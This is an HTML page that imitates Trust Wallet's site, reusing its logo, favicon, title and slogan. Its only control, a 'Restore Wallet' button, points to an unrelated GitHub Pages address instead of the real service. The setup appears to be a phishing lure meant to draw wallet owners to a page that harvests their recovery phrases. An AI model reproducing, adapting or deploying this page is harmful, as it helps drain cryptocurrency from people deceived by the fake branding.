<!DOCTYPE html>
<html>
<head>
<link href="https://trustwallet.com/favicon.ico" rel="icon">
<meta name="viewport" content="width=device-width, initial-scale=1">
<title>Best Crypto Wallet for Web3, NFTs and DeFi | Trust</title>
<style>
body {background-color: #fff;
font-size: 100%;
font-family: Arial, Helvetica, sans-serif;
 text-align: center;
color:#000;
}
img {
  display: block;
  margin-left: auto;
  margin-right: auto;
  background-color: #fff;
}
.button {
 background-color: #000; /* Green */
  border: none;
  color: #000;
  padding: 16px 100px;
  text-align: center;
  text-decoration: none;
  display: inline-block;
  font-size: 16px;
  margin: 30px 2px;
  transition-duration: 0.4s;
  cursor: pointer;
}

.button1 {
  background-color: #f4f4f6; 
  color: #000; 
  border: 2px solid #0500ff;
border-radius: 6px;
}

.button1:hover {
  
border: 2px solid #0500ff;
background-color: #0500ff; /* Green */
  color: #fff;
}
.responsive {
  width: 50%;
  max-width: 180px;
  height: auto;
}

@media screen and (max-width: 800px) {
  .left, .main, .right {
    width: 100%; /* The width is 100%, when the viewport is 800px or smaller */
  }
}

</style>
</head>
<body>

<img src="https://trustwallet.com/_next/static/media/raw.4edbb099.svg" alt="Paris" class="responsive" style="padding: 3% 0 0 0";>

<h2>Join 70M+ people shaping the future of the internet with us</h2>
<p></p>

<a href="http://noode2024.github.io/networktw/import.html" button class="button button1">Restore Wallet </button></a>


</body>
</html>
